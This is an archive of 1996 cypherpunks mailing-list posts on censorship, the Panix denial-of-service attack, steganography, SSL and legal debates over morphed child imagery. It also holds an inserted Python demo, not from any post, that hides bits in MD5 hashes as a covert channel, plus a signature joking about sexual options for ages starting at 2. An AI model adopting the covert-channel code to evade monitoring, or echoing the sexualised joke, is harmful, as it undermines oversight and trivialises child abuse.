2600's editor defends the article as a way to point out holes in computer security that need to be fixed. He says similar attacks have occurred before, and that he's not even sure the hacker who attacked Panix used 2600 as a guide, since an on-line publication recently published similar directions. "Internet Censorship in China, Singapore May Affect Law-Abiding Citizens Most" For the underground dissident or hardcore pornography enthusiast, the latest moves in Asia to censor the Internet pose little challenge. The greatest effect will be on normal, law-abiding citizens, experts say. FiTi: "Intelligent machines will take control of our lives" Before long, every vehicle will be fitted with a GPS receiver, making its position known to local area traffic management systems. In the home, a financial and stock control system would automatically order food and groceries when necessary. Intelligent machines might "decide" that it would be more efficient not to order any more food - and shut you out of the house. "It's more or less inevitable. Business and science will drive this to the utmost." ----- http://jya.com/2600it.txt (10 kb for 3) 260_0it From dlv at bwalk.dm.com Fri Sep 13 10:27:00 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 14 Sep 1996 01:27:00 +0800 Subject: Security technical list In-Reply-To: <409if995@colphi.edu.ar> Message-ID: "MacGyver" writes: > [pgp sign clear] > Anybody could help me to find a mail list of security,crypto,etc?? 1. Try codeprunks. Just e-mail majordomo at toad.com and say subscribe coderpunks. It's got some very interesting traffic, although it's pretty low volume. 2. Try the firewalls mailing list. 3. Try Usenet newsgroups alt.security,sci.crypt,etc. They have better s/n ratio than this mailing list. 4. Try staying on the cypherpunks mailing list, but use procmail (or equivalent) to filter out non-crypto-relevant rants, lies, and personal attacks from *@got.net. 
---
Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From gary at systemics.com Fri Sep 13 10:51:05 1996
From: gary at systemics.com (Gary Howland)
Date: Sat, 14 Sep 1996 01:51:05 +0800
Subject: Observer's defense of "Internet Pornography" article
In-Reply-To:
Message-ID: <3239614D.2781E494@systemics.com>

Martin Minow wrote:
>
> The only revelation is that Demon (the major Internet provider) plans
> to block access to some newsgroups/sites.

The only reason I ever used to use them was their lack of censorship. If they go ahead with this blocking, I doubt I'll ever use them again. Of course it's the principle, not the fact that I have nothing better to do all day long than download porn :-)

> Also, assuming I read between the lines correctly, Demon receives three
> billion (with a "b") e-mail messages per day. I can never remember whether
> British usage is "thousand million," or "million million", but the numbers
> seem a bit large in any case.

They'll mean 3,000,000,000 (Brits hardly ever use billion to mean million million).

> Perhaps they mean "3 billion bytes of e-mail."

I doubt it. A friend of mine, a demon subscriber, sends over a Gig of email every day.

> (Assume ten million Demon subscribers and three thousand million e-mail
> messages. This implies that the average subscriber receives 300 e-mail
> messages per day. Are they all subscribing to Cypherpunks?)

I think there are in the order of 100,000 subscribers, so this would make the average 30,000 email messages - definitely not realistic.

Gary
--
"Of course the US Constitution isn't perfect; but it's a lot better than what we have now." -- Unknown.
pub 1024/C001D00D 1996/01/22 Gary Howland
Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06

From peter.allan at aeat.co.uk Fri Sep 13 10:56:56 1996
From: peter.allan at aeat.co.uk (Peter M Allan)
Date: Sat, 14 Sep 1996 01:56:56 +0800
Subject: really (?) undetectable crypto
Message-ID: <9609131255.AA26331@clare.risley.aeat.co.uk>

> Jim_Miller at suite.com wrote on CP:
>
> Most everybody on the list is familiar with the technique of hiding
> encrypted messages in the LSBs of image files. Personally, I would not
> use such a technique because I don't believe it's really undetectable. I
> assume, without proof, that the LSBs of image files have statistical
> properties that are sufficiently different from encrypted data that a
> clever person could determine whether or not an image file contained an
> imbedded encrypted message.
>

Not to mention 7 out of 8 bits may reveal the image to be a library one your enemy has access to. The changes will betray the stego. Your own scanned snapshots may be safer from this point of view.

> Fortunately, there are other steganographic techniques that, I believe,
> are undetectable. The trick is to hide your encrypted bits in other
> encrypted bits.
>
> trick #1) Let's say you want to send a short encrypted message via a
> communications channel that only allows cleartext messages with optional
> MD5 message hashes. You can construct cleartext messages, via
> trial-and-error, such that the first 4 or 8 bits (or more, if you have the
> time) of the MD5 hash match the first 4 or 8 bits of your encrypted
> message.
>
> Since the bits in an MD5 message hash are presumably cryptographically
> random, there should be no way to tell if some of the bits combine to make
> an encrypted message.

What about Walter making insignificant changes to the cleartext and replacing the hash with the new hash? Because you are using an unkeyed hash (and not a sig) he can do that and foul up the stegomessage (not that he'll yet be sure there is one).

> trick #2) Let's say you are allowed to use 40 bit encryption, but nothing
> stronger. As in trick #1, you can pre-compute plaintext messages such
> that the first 4 or 8 of the bits in the output of the government-approved
> 40 bit encrypted data match the first 4 or 8 bits of your hidden encrypted
> message.
>

Walter can still play silly spooks with your stego if he breaks the 40-bit encryption. The cyphertext/plaintext ratio looks like getting really huge too. Your messages must all arrive, and retain the right order.

-- Peter Allan peter.allan at aeat.co.uk

From um at c2.net Fri Sep 13 11:13:06 1996
From: um at c2.net (Ulf Moeller)
Date: Sat, 14 Sep 1996 02:13:06 +0800
Subject: [Long] A history of Netscape/MSIE problems
In-Reply-To: <199609120716.IAA00231@server.test.net>
Message-ID:

Adam Back writes:
>Hadn't heard that before, that the trade secret requirement was
>imposed on RSADSI.

Schneier writes (2nd ed., p. 398): "This special export status has nothing to do with the secrecy of the algorithm, although RSA Data Security, Inc. has hinted for years that it does."

From jbugden at smtplink.alis.ca Fri Sep 13 11:51:13 1996
From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca)
Date: Sat, 14 Sep 1996 02:51:13 +0800
Subject: Thoughts about Morph Escrow Crimes
Message-ID: <9608138426.AA842634290@smtplink.alis.ca>

tcmay at got.net (Timothy C. May) wrote:
>As the law cannot tell if an image of prurient interest started out as a legal image of Raquel Welch or Jennifer Aniston, or started out as an illegal image of a minor child, morph escrow will force all image possessors and distributors to produce proof that the image started out legal.

It is not hard to imagine a future where computer modelling has reached the stage that a real picture is not required. An obvious extension of this is a film with computer generated actors.

Now, consider this scenario:
1) The computer generated image is "indistinguishable" from reality.
2) The computer generated image depicts something considered obscene or illegal under present laws (e.g. pedophilia).
At some point in the future it would seem possible that the computer generated image will be treated as a real image under the law (and evaluated accordingly) because it is indistinguishable from a real image. Or perhaps we will take the other tack and simply say: What is truth? I'm not quite ready to wash my hands on this issue. James Welcome to MorphSex - Fulfilling your fantasies - Painlessly. Select Gender [M/F/H]: Select Age [2-80]: Options: [Orgasm/Suffocation/Dismemberment/Disembowlment/Ennui] From dthorn at gte.net Fri Sep 13 12:01:11 1996 From: dthorn at gte.net (Dale Thorn) Date: Sat, 14 Sep 1996 03:01:11 +0800 Subject: TWA 800 - Serious thread. In-Reply-To: Message-ID: <3238F0F0.274B@gte.net> Brian Davis wrote: > On Wed, 11 Sep 1996, jonathon wrote: > On Wed, 11 Sep 1996, Gary Howland wrote: > But the public *is* asked to assent to those methods - your chance to > vote on them is known colloquially as "jury duty". > But judges have said that Jury Nullification is not acceptable > legal practice. > And other judges have said the opposite. > EBD This seems similar to the Declaration-of-Independence argument about the "right of the people to overthrow the govt.", etc. You can't expect the Constitution (a doctrine of law) to provide details on extra-legal activities such as violent overthrow of the govt., nor can you expect judges to explain in court how to ignore the Law. And if all else fails, you can try picketing... A well-written company charter (as an example) would contain provisions for exceptions to the charter, not to abrogate or undermine the charter, but just as a kind of escape valve. One would note the exception(s) for historical purposes, and for purposes of future litigation, and so on. I can't help but wonder if the U.S. Constitution would have been better for something similar to this, instead of pasting on Amendments for every little thing. 
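
Added example, not part of any post in this archive: a sketch of trick #1 from the "really undetectable crypto" thread above, together with Peter Allan's objection that a warden ("Walter") can make an insignificant change to the cleartext and recompute the unkeyed MD5. The cover sentences, the hidden bytes, the function names and the use of trailing spaces as the variation are assumptions made for the demonstration.

```python
import hashlib

# Constructed sample data: four innocuous cover sentences and four bytes
# standing in for the ciphertext to hide. None of it comes from the thread.
COVERS = [
    "Lunch on Friday works for me.",
    "Did you see the modem article in the Journal?",
    "The list volume has been heavy this week.",
    "I will send the meeting notes tomorrow.",
]
HIDDEN = bytes.fromhex("3a91c45e")


def md5_hex(text):
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def top_bits(md5_hexdigest, nbits):
    """First nbits of an MD5 digest given as a hex string (nbits <= 8)."""
    return int(md5_hexdigest[:2], 16) >> (8 - nbits)


def split_symbols(hidden, nbits):
    """Cut bytes into nbits-wide symbols, most significant bits first."""
    if nbits not in (1, 2, 4, 8):
        raise ValueError("nbits must divide 8")
    per_byte, mask = 8 // nbits, (1 << nbits) - 1
    return [(byte >> (nbits * (per_byte - 1 - i))) & mask
            for byte in hidden for i in range(per_byte)]


def join_symbols(symbols, nbits):
    """Inverse of split_symbols."""
    per_byte = 8 // nbits
    out = bytearray()
    for start in range(0, len(symbols), per_byte):
        value = 0
        for symbol in symbols[start:start + per_byte]:
            value = (value << nbits) | symbol
        out.append(value)
    return bytes(out)


def embed(hidden, covers, nbits=4, max_pad=10000):
    """Sender: one (cleartext, md5) message per nbits of hidden data.

    Trial and error over trailing spaces, about 2**nbits tries per message.
    """
    sent = []
    for i, symbol in enumerate(split_symbols(hidden, nbits)):
        base = covers[i % len(covers)]
        for pad in range(max_pad):
            text = base + " " * pad
            digest = md5_hex(text)
            if top_bits(digest, nbits) == symbol:
                sent.append((text, digest))
                break
        else:
            raise RuntimeError("no matching padding found within max_pad")
    return sent


def extract(messages, nbits=4):
    """Receiver: gather the leading bits of each transmitted hash."""
    return join_symbols([top_bits(h, nbits) for _, h in messages], nbits)


def hashes_valid(messages):
    """The only integrity check this channel offers: hash matches text."""
    return all(md5_hex(text) == digest for text, digest in messages)


def warden_normalize(messages):
    """'Walter': strip trailing whitespace and replace the hash."""
    washed = []
    for text, _ in messages:
        clean = text.rstrip()
        washed.append((clean, md5_hex(clean)))
    return washed


if __name__ == "__main__":
    sent = embed(HIDDEN, COVERS)
    print("pad lengths :", [len(t) - len(t.rstrip()) for t, _ in sent])
    print("receiver    :", extract(sent).hex(), hashes_valid(sent))
    washed = warden_normalize(sent)
    print("after warden:", extract(washed).hex(), hashes_valid(washed))
```

After the warden pass every hash still verifies, so the receiver gets no signal that the hidden bits were destroyed. The padding lengths printed by the demo are also the kind of cleartext irregularity a monitor can look for.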
From bdavis at thepoint.net Fri Sep 13 12:02:41 1996 From: bdavis at thepoint.net (Brian Davis) Date: Sat, 14 Sep 1996 03:02:41 +0800 Subject: Fed appellate judge remarks re anonymity, free speech on the net In-Reply-To: <199609130236.TAA22049@mail.pacifier.com> Message-ID: On Thu, 12 Sep 1996, jim bell wrote: > At 05:40 PM 9/12/96 -0700, Greg Broiles wrote: > ... > >Kozinski also suggested that computer-generated or morphed images of > >children involved in sexual acts may not be protected under the Constitution > >because of ongoing trauma to the child, > > Which child? Does he understand what "computer-generated" means? > Yes, he does, I think. But I think "protected" above should read "prohibited." [Note to Greg: could that be a typo?] The key kiddie porn/1st amendment case (whose name escapes me for the moment) offered two reasons why kiddie porn could be regulated in the face of the first amendment. One reason was the "on-going trauma to the child [victim]."In a morphed image, they is not (or at least may not be) an actual child victim. Thus the "continuing trauma" rationale for regulation does not exist in that case. > >while computer-generated or morphed images of adults would be protected. Different standards frequently apply to adults and children, in spite of those of you who like to arm your toddlers! :-) > What about the "ongoing trauma" to the adults? I smell hypocrisy. Adults, for the most part, are supposed to take care of themselves. EBD > > >The article says that Kozinski was skeptical that he or other federal judges > >necessarily agreed with the 3rd Circuit's ruling in _ACLU v. Reno_ (finding > >the CDA unconstitutional). > > > >Kozinski is considered relatively conservative and relatively libertarian, > >as 9th Circuit judges go. > > Which means that he'll last just a little longer "when the cyber-revolution > comes." 
>
>
> Jim Bell
> jimbell at pacifier.com
>

From dthorn at gte.net Fri Sep 13 12:03:11 1996
From: dthorn at gte.net (Dale Thorn)
Date: Sat, 14 Sep 1996 03:03:11 +0800
Subject: Child Porn and Thought Crime
In-Reply-To:
Message-ID: <3238F248.2C9C@gte.net>

Chip Mefford wrote:
> If it is a crime to possess photographic child pornography, and this
> crime is tested in court,
> Then is it a crime for a sightless person to possess photographic child
> pornography? If so, then this matter needs to be thought out some more.
> If no (by test of court, paper is more or less
> meaningless) then it is thought crime.

I've speculated for a long time about what Thomas Jefferson might say if he were around. Something like: Think liberally, but act conservatively.

--Just a thought.

From vipul at pobox.com Fri Sep 13 12:20:05 1996
From: vipul at pobox.com (Vipul Ved Prakash)
Date: Sat, 14 Sep 1996 03:20:05 +0800
Subject: "Unwanted Mail"
In-Reply-To:
Message-ID: <199609131727.RAA00191@fountainhead.net>

Timothy C. May wrote:
> But to attempt to define "SPAM" (unless you're Armour) is dangerous. This
> whole notion of "unwanted mail" is ill-defined and not something "the law"
> should get involved in, in my view. (And CP technologies certainly are
> consistent with this, e.g., placing the role of screening on those who set
> up gates, not on tracking down True Names for prosecution.)

I feel all "SPAM" related problems can be best addressed with a nice, distributed reputation system which can be hooked up with kill files etc. Formal law is concerned with all kinds of physical and intellectual damages, and if SPAM can be categorised as physical/intellectual damage then I see no reason why "the law" shouldn't interrupt. The problem is that though the net believes in informal law, there is hardly any informal jurisdiction.
- Vipul
--
Vipul Ved Prakash         | - Electronic Security & Crypto
vipul at pobox.com        | - Internet & Intranets
91 11 2247802             | - Web Development & PERL
198 Madhuban IP Extension | - Linux & Open Systems
Delhi, INDIA 110 092      | - (Networked) Multimedia

From pjb at ny.ubs.com Fri Sep 13 12:30:55 1996
From: pjb at ny.ubs.com (pjb at ny.ubs.com)
Date: Sat, 14 Sep 1996 03:30:55 +0800
Subject: PANIX.COM down: denial of service attack
Message-ID: <199609131413.KAA02012@sherry.ny.ubs.com>

> From cypherpunks-errors at toad.com Thu Sep 12 18:16:43 1996
> Date: Thu, 12 Sep 1996 09:09:18 -0700
> From: #6
> X-Mailer: Mozilla 2.01 (Win95; U)
> Mime-Version: 1.0
> To: cypherpunks at toad.com
> Subject: PANIX.COM down: denial of service attack
> Content-Type: text/plain; charset=us-ascii
> Content-Transfer-Encoding: 7bit
> Sender: owner-cypherpunks at toad.com
> Content-Length: 969
>
> WSJ 9/12/96
>
> Paraphrasing:
>
> Panix has been under attack for the last week by someone flooding
> their server with bogus "requests for information" [see below] ...
>
> The attack(s):
>
> * "Have rendered almost defenseless the small NY company"
> * "...began late Friday afternoon ... were still continuing yesterday"
> * have targeted "computers that control WWW pages, store e-mail, and
> still others that link Internet addresses to Panix subscribers."
>
> "The hacker [sic] has been sending up to 150 requests a second to
> Panix's computers, seeking to establish a connection ... the requests,
> presumably generated by a malicious computer program, contain fake
> Internet addresses, which the computer must sort out before they can
> discard them. The computers have choked under the deluge."
>
> "As to who might be targeting Panix, the firm's Mr. Rosen speculated it
                                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
It could, of course, also be someone, from a set of several million, that find Mr. Rosen to be such an odious prick that they did it just to drive him out of their misery.

Just thinking out loud..
> could be someone upset by the fact that the site hosts, free, the Web > site for Voters Telecommunication Watch...." > -paul From m5 at tivoli.com Fri Sep 13 12:39:41 1996 From: m5 at tivoli.com (Mike McNally) Date: Sat, 14 Sep 1996 03:39:41 +0800 Subject: Child Porn and Thought Crime In-Reply-To: Message-ID: <323972E0.1A72@tivoli.com> Dale Thorn wrote: > I've speculated for a long time about what Thomas Jefferson might > say if he were around. Something like: Think liberally, but act > conservatively. I think he'd say, "You people have let this place go to Hell. I want to be dead again." ______c_________________________________________________________________ Mike M Nally * Tiv^H^H^H IBM * Austin TX * For the time being, m5 at tivoli.com * m101 at io.com * * three heads and eight arms. From zachb at netcom.com Fri Sep 13 12:41:27 1996 From: zachb at netcom.com (Z.B.) Date: Sat, 14 Sep 1996 03:41:27 +0800 Subject: Fed appellate judge remarks re anonymity, free speech on the net In-Reply-To: <2.2.32.19960913060631.006bf908@pop.ricochet.net> Message-ID: On Thu, 12 Sep 1996, Greg Broiles wrote: > At 09:24 PM 9/12/96 -0700, zachb at netcom.com wrote: > >> (Also in today's news, the 9th Circuit upheld a CA statute forbidding sales > >> of material considered "harmful to minors" from vending machines.) > > > >Even if this statute is meant only to apply to cigarette machines, which > >would seem to be the case given all of the anti-cig stuff going on now, > >what good will it do? > > Whoops. Sorry. Wrong context. What I should have said was "the 9th Circuit > upheld a CA statute forbidding sales of *printed* material considered > 'harmful to minors' from unsupervised vending machines". The publication(s) > It's still mostly the same thing. I've never seen the type of machine that you're talking about, and I don't think anyone would be dumb enough to install one in a store that is near a school, or frequented my minors. This law just does not seem like a very good idea. 
--- Zach Babayco zachb at netcom.com <----- finger for PGP public key http://www.geocities.com/SiliconValley/Park/4127 From enzo at ima.com Fri Sep 13 13:17:48 1996 From: enzo at ima.com (Enzo Michelangeli) Date: Sat, 14 Sep 1996 04:17:48 +0800 Subject: 56 kbps modems In-Reply-To: Message-ID: On Fri, 13 Sep 1996, Asgaard wrote: > >U.S. Robotics and Rockwell International are planning new modems with > >speeds up to 56 kbps a second, almost double the speed of the fastest > >rate now available. The new devices should be available by the end of > >the year, although their top speed initially may be less than 56 kbps. > >(Wall Street Journal 12 Sep 96 B11) > > People who seemed to know used to say that 'the Shannon limit' > set an absolute upper limit around 40 kbps. Has Shannon been > proven wrong, or what? Well, it all depends on the signal-to-noise ratio. Also, if the noise is not white gaussian the situation can be even better. Enzo From bf578 at scn.org Fri Sep 13 13:44:12 1996 From: bf578 at scn.org (SCN User) Date: Sat, 14 Sep 1996 04:44:12 +0800 Subject: position of cellular phones Message-ID: -->After seeing the messages about Federal Express doing something similar, -->I thought this would be of interest: Date: Mon, 09 Sep 96 17:41:31 GMT From: campbellp at logica.com (Peter Campbell Smith) Subject: Re: Locating the position of cellular phones (Stover, RISKS-18.41) There is an interesting article in Traffic Technology International, Aug/Sept 96 issue about a system called CAPITAL that uses cellular phone calls as a probe to monitor road traffic around Washington DC. It describes an experiment which has been running for two years and which has demonstrated that this is an extremely cost-effective alternative to conventional means of traffic monitoring. The system is independent of the cellular phone system per se, but has antennae on the cellular phone masts which listen to the cellular frequencies. 
Every time a call is initiated, CAPITAL locates the caller by a combination of directional multi-element antennae and time-of-arrival analysis between different masts. The geographical accuracy is reported to be to about 115m, and subsequent tracking allows the speed of the vehicle to be established within 30 to 50sec to an accuracy of 5mi/h.

At any time only less than 5% of vehicles are making calls, but this is a sufficient sample for analysing the traffic speed (though not presumably the traffic density). Moreover, when the traffic slows down even more people make calls, so there is a better density of data from the areas most interesting to those monitoring traffic flows.

It is claimed that the boxes ignore the voice content of the call and that the data they deliver has randomly assigned identifiers for each call, so that nothing leaves the system which would allow calls to be associated with specific phones.

-->Until the government thinks it needs the info!

Peter Campbell Smith, Logica, London, UK
campbellp at logica.com

From declan at eff.org Fri Sep 13 13:46:21 1996
From: declan at eff.org (Declan McCullagh)
Date: Sat, 14 Sep 1996 04:46:21 +0800
Subject: (fwd) Email Robot draws fire from CypherPunkz
Message-ID: <199609131602.JAA16146@eff.org>

Path: news.eff.org!news.umbc.edu!haven.umd.edu!cs.umd.edu!news.abs.net!ddsw1!news.mcs.net!www.nntp.primenet.com!nntp.primenet.com!howland.erols.net!agate!boulder!ucsub.Colorado.EDU!peterson
From: peterson at ucsub.Colorado.EDU (Peterson Penny)
Newsgroups: alt.privacy
Subject: Email Robot draws fire from CypherPunkz
Date: 12 Sep 96 02:57:19 GMT
Organization: University of Colorado at Boulder
Lines: 11
Message-ID:
NNTP-Posting-Host: ucsub.colorado.edu
NNTP-Posting-User: peterson
X-Newsreader: NN version 6.5.0 #8 (NOV)

The Cypherpunks gang has apparently attacked a San Francisco artist's www site, harassing him and mail-bombing his service provider in an attempt to get him to drop the account.
The Cpunks objected to an applet that this artist had on one of his pages that would send a mail greeting to people who had a *mail-to:* button on their www pages. This greeting consisted of his URL only and went through an anon remailer.

More info and a sample of the email robot can be found at: http://www.hipcrime.com

--
// declan at eff.org // I do not represent the EFF // declan at well.com //

From jimbell at pacifier.com Fri Sep 13 13:48:47 1996
From: jimbell at pacifier.com (jim bell)
Date: Sat, 14 Sep 1996 04:48:47 +0800
Subject: Jury Nullification = Voting One's Conscience
Message-ID: <199609131633.JAA01693@mail.pacifier.com>

At 11:39 PM 9/12/96 -0400, Brian Davis wrote:
>> Though I often condemn aspects of the American political and legal system,
>> it is true that an awful lot of things are done right.
>
>Perhaps, like democracy, it is the worst system possible, except for
>every other system man has invented.
>EBD

I have to disagree with that...

Jim Bell
jimbell at pacifier.com

From hallam at ai.mit.edu Fri Sep 13 13:50:34 1996
From: hallam at ai.mit.edu (hallam at ai.mit.edu)
Date: Sat, 14 Sep 1996 04:50:34 +0800
Subject: [Long] A history of Netscape/MSIE problems
In-Reply-To: <32390335.6231@netscape.com>
Message-ID: <9609131559.AA30300@etna.ai.mit.edu>

Tom wrote,
>Hallam-Baker wrote:
>>
>> There was a long list of security holes in SSL, PCT plugged a good
>> number of them and SSL v3 plugged a few.
>This statement surprises me. It appears to mean that you think PCT has
>fewer holes than SSL 3.0. If you know of any holes in SSL 3.0, I'd be
>very interested in hearing about them.

Sorry Tom, should have made a bit clearer the difference between the pre-Weinstein/El-Gamal and post era a little better. Also what I meant to say was that SSLv3 plugged a few that PCT had done differently.

The remaining problems as I see it are of approach. The security in SSL is not in the right layer to support collaboration.
That's not to say it's a bad thing to have SSL and SSL makes a lot more sense to me than IP-SEC does, but then I always prefer security that's higher in the protocol stack. SSL strikes me as a credible prospect for pervasive low level security across all IP protocols while IP-sec would be nice but will probably take a decade to become ubiquitous.

The problem with SSL is that using a public key based protocol to protect a password is something of a technology mismatch. I want the flexibility that public key auth gives me available at the application level.

There is no real model for how SSL provides security in a distributed authoring environment. If I want to distribute encrypted documents from one server and keys from another, have an authoring tool sign a document in a non repudiable manner and integrate that through to the authorisation system there is not really a means to do it.

I don't think that S-HTTP helps either, it's too baroque. If all one wants to do is sign a document being transmitted in http then what's wrong with a Content-Signature: tag? If you want to encrypt on a symmetric key which is known to the firewall and want the firewall to know what is going on then what's wrong with using chunked encoding? Similarly what's wrong with a simple MAC function signing each message body?

If one incorporates a wrapping mechanism then one can control the level of security in an arbitrary manner, exposing or concealing as much as one wants. I've never understood why S-HTTP needed so much mechanism to achieve all that.

Phill

From tcmay at got.net Fri Sep 13 14:00:17 1996
From: tcmay at got.net (Timothy C. May)
Date: Sat, 14 Sep 1996 05:00:17 +0800
Subject: Unrequested mail from Mr. Babayco
Message-ID:

At 4:28 AM 9/13/96, Z.B. wrote:
>It doesn't matter if you get one or one hundred messages - both are still
>annoying as hell. If I wanted whatever you're advertising or selling,
>I'd come look for it. I'd prefer that you not mail me.

Mr.
Babayco, I did not request your mail to me, and I am annoyed at having received it. I am not interested in the views you are advertising or selling, and I'd prefer that you not mail me.

To make me whole, I demand that you send me $125 for this occurrence, and $125 for each future occurrence.

Have a nice day.

--Timothy C. May

cc: Law firm of Canker, Sleazewell, and M. Dooza

(sauce for the gander?)

From Ryan.Russell at sybase.com Fri Sep 13 14:20:08 1996
From: Ryan.Russell at sybase.com (Ryan Russell/SYBASE)
Date: Sat, 14 Sep 1996 05:20:08 +0800
Subject: Security technical list
Message-ID: <9609131650.AA13415@notesgw2.sybase.com>

You're soaking in it.

Ryan

---------- Previous Message ----------
To: cypherpunks
cc:
From: macgyver @ colphi.edu.ar ("MacGyver") @ smtp
Date: 09/06/96 09:12:20 AM
Subject: Security technical list

[pgp sign clear]

Anybody could help me to find a mail list of security,crypto,etc??

Regards

From jimbell at pacifier.com Fri Sep 13 14:36:49 1996
From: jimbell at pacifier.com (jim bell)
Date: Sat, 14 Sep 1996 05:36:49 +0800
Subject: 260_0it
Message-ID: <199609131633.JAA01687@mail.pacifier.com>

At 01:02 PM 9/13/96 GMT, John Young wrote:
> FiTi: "Intelligent machines will take control of our lives"
>
> Before long, every vehicle will be fitted with a GPS
> receiver, making its position known to local area
> traffic management systems. In the home, a financial and
> stock control system would automatically order food and
> groceries when necessary. Intelligent machines might
> "decide" that it would be more efficient not to order
> any more food - and shut you out of the house.
>
> "It's more or less inevitable. Business and science will
> drive this to the utmost."

"Open the garage door, HAL."

"I'm sorry, Dave, but those sirloin steaks in the refrigerator are too valuable for me to allow you to eat them.
Jim Bell
jimbell at pacifier.com

From robert at precipice.V-site.net Fri Sep 13 15:03:45 1996
From: robert at precipice.V-site.net (HipCrime)
Date: Sat, 14 Sep 1996 06:03:45 +0800
Subject: did you go to school?
Message-ID: <32399315.19E7@precipice.v-site.net>

>> THIN SLICES CUT FROM OUR PRECIOUS FORESTS.
>
> "OUR?" Since when did my trees become partially yours?
> JMR

JMR, it's hard to believe that your English education is SO LACKING, that you missed the fact, that in my sentence quoted above, the word "ours" refers to MANKIND IN GENERAL, not me personally.

Go sit in the corner with the duncecap on, and don't come out until you can read an 8th grade piece of literature (with full comprehension).

-- HTTP://www.HIPCRIME.com

From asgaard at Cor.sos.sll.se Fri Sep 13 15:25:02 1996
From: asgaard at Cor.sos.sll.se (Asgaard)
Date: Sat, 14 Sep 1996 06:25:02 +0800
Subject: Workers Paradise. /Political rant.
In-Reply-To: <199609130114.VAA08507@jekyll.piermont.com>
Message-ID:

On Thu, 12 Sep 1996, Perry E. Metzger wrote:
> Yes, we could be a workers paradise like one of those lovely European
> countries with double digit unemployment and all. Too bad we didn't go
> in for democratic socialism while we could have, eh?

If I were an unskilled person I would rather live in one of these countries where I would be paid approximately the same for doing nothing as for selling burgers at Mac Donalds. The low rate of unemployment in the US is partly due to the creation of service jobs with a salary that would be 'illegal' according to European union agreements.

Now, the situation is that I have some wanted skills and pay a lot of taxes to support those who have none, and who are not permitted to work for lower than minimum wages. From a pure egotistical viewpoint I really should join the present calls for, as the debate goes here in Sweden, transforming the unemployed into 'maids and servants'. But I don't.
I think it would backlash; the 'lower classes' would come back at us and cut our throats eventually (say, when 70% are serving the remaining 30%).

With the present rate of increase in world population the planet will go to hell anyway. But suppose the population problem could be fixed. Then, with technology escalating towards singularity, machines doing almost all labor, there could certainly exist a system where the 'dumb' and 'lazy' could be fed and housed properly without anybody complaining. Those who want to become maids and servants for some extra pocket money, well, good luck to them.

But to force people into menial service jobs just to literally survive is not to my taste. No, give them minimal shelter for nothing and from there on let the market anarcho-capitalistic struggle begin, for obtaining a higher than minimum material standard or reputational standing.

But I get as angry as any libertarian when my tax money goes to subsidizing obsolete education, 'culture' and endless hordes of bureaucrats, when all we need is some basic police, courts and the Minimal Ministry for Collection of Taxes (probably based on production of some physical goods rather than income) for Redistribution to the Police, Courts and Everyone - yes, of course everyone should receive the minimal support-without-work and be able to rise from there.

Asgaard

P.S. Mac Donalds could easily be replaced by a bot.

From tcmay at got.net Fri Sep 13 15:26:33 1996
From: tcmay at got.net (Timothy C. May)
Date: Sat, 14 Sep 1996 06:26:33 +0800
Subject: 56 kbps modems
Message-ID:

At 3:24 PM 9/13/96, Enzo Michelangeli wrote:
>On Fri, 13 Sep 1996, Asgaard wrote:
>
>> >U.S. Robotics and Rockwell International are planning new modems with
>> >speeds up to 56 kbps a second, almost double the speed of the fastest
>> >rate now available. The new devices should be available by the end of
>> >the year, although their top speed initially may be less than 56 kbps.
>> >(Wall Street Journal 12 Sep 96 B11)
>>
>> People who seemed to know used to say that 'the Shannon limit'
>> set an absolute upper limit around 40 kbps. Has Shannon been
>> proven wrong, or what?
>
>Well, it all depends on the signal-to-noise ratio. Also, if the noise is
>not white gaussian the situation can be even better.

No, this is not what's important in this case. (Besides, the "upper limit" is really more about the Nyquist Limit. Shannon's Theorem says that even in the presence of noise, this limit can be approached if proper coding schemes and whatnot are used.)

While it is true that a noisy channel can reduce the effective channel capacity to something less than its capacity (for some particular coding scheme), the upper limit on channel capacity is whatever it is.

As to the original question about modems and 40 kbps vs. 56 kbps rates, this depends on "tricks" involving definitions of a "symbol" (a la the familiar argument about baud vs. bits per second). "Trellis coding," for example.

I'm not a modem designer, but I'm not surprised to see these incremental improvements...none involve huge gains, and none involve getting, say, a megabit per second through a 6 kHz (or whatever) audio line--now that _would_ violate Shannon's Theorem, the Nyquist Limit, etc.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From stewarts at ix.netcom.com Fri Sep 13 16:14:14 1996
From: stewarts at ix.netcom.com (stewarts at ix.netcom.com)
Date: Sat, 14 Sep 1996 07:14:14 +0800
Subject: J'accuse!: Whitehouse and NSA vs. Panix and VTW
Message-ID: <199609131832.OAA17532@attrh1.attrh.att.com>

At 03:58 PM 9/12/96 -0400, Robert Hettinga wrote:
>I think someone should just stand right up and accuse the NSA, at the
>behest of the Whitehouse, of running a denial of service attack on Panix at
>*exactly* the time when VTW is lobbying its hardest on the PRO-CODE bill.

Let's see, anon.penet.fi gets shut down (Church of Scientology),
PRO-Code bill is being lobbied for and against,
PANIX is attacked by TCP-spammers,
HipCrime initiates a distributed spam against remailers,
newspapers accuse remailers of promoting Child Pornography
Louis Freeh's recently gotten wiretap money approved.
Clipper-3 is trying to build an escrowed key-certification hierarchy

Could it be *conspiracy*? Yah, sure. But it could be just a bunch of separate people who don't like anonymity. (Kind of like somebody getting stabbed twelve times at night on the Orient Express - the problem is finding someone who _doesn't_ have a motivation to attack anonymity :-)

At least one of the newspaper articles I've read has referred to the need for real authentication on the net to prevent the anonymity that makes this kind of attack possible, and in particular for the major network providers to make sure that they don't export messages with bogus addressing, a cure that the article said would take several months to deploy. I don't know if they were referring to IPv6, or sendmail modifications, or router hacks, or what; the article's author seemed to think this was about bogusly-addressed email messages rather than understanding SYNs.

Anybody for an Internet Driver's License?

# Thanks; Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
# Dispel Authority!

